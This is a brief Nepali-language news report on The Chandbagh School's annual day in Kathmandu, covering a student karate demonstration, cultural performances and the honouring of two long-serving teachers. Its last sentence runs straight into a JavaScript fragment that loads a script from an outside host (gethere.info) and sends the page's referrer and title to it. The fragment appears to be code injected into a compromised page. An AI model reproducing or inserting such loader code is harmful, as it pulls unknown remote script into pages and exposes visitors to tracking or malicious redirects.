कठमाडौं, असोज १७ । बाँसवारीस्थित द चाँदबाग स्कुलले आफ्नो वार्षिक दिवसका अवसरमा आयोजित कार्यक्रममा चाँदबागका कराते खेलाडीले प्रदर्शनी खेल प्रस्तुत गरेका छन् । कमलादीस्थित नेपाल प्रज्ञा प्रतिष्ठानमा भएको कार्यक्रममा कक्षा ८ देखि १० सम्मका विद्यार्थीले आफ्नो कैशल प्रदर्शन गरेका थिए । karate

सो अवसरमा विद्यार्थीहरुले नाटक, साँस्कृति कार्यक्रम, गीतलगायत विभिन्न मनोरञ्जनात्मक कार्यक्रम प्रस्तुत गरेका थिए । चाँदबागमा विगत २० वर्षदेखि कार्यरत शिक्षक लाकुकुविर राई तथा विगत १६ वर्षदेखि कार्यरत नेपाली शिक्षीका शैलजा राणा शाहलाई सम्मान गरिएको थियो ।
कार्यक्रमको शिक्षा मन्त्रालयका सह–सचिव एवं प्रवक्ता डा. हरि लम्सालले उद्घाटन गर्दै सफल व्यक्ति बन्नेमा विद्यार्थीले जोड दिनु पर्ने बताए । सो अवसरमा सीजी एजुकेसनका एकेडेमिक प्रमुख भूषण गुरुङ, सीजी ग्रुपकी बिजनेस डेपुटी हेड गर्ली अग्रवाल, चाँदबागका भाइस प्रिन्सिपल सुकुमार थपलियालगायतले चाँदबागको विविध पक्ष बारे प्रकाश पारेका थिए । चाँदबाग २० वर्षअघि स्थापना भएको थियो ।s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;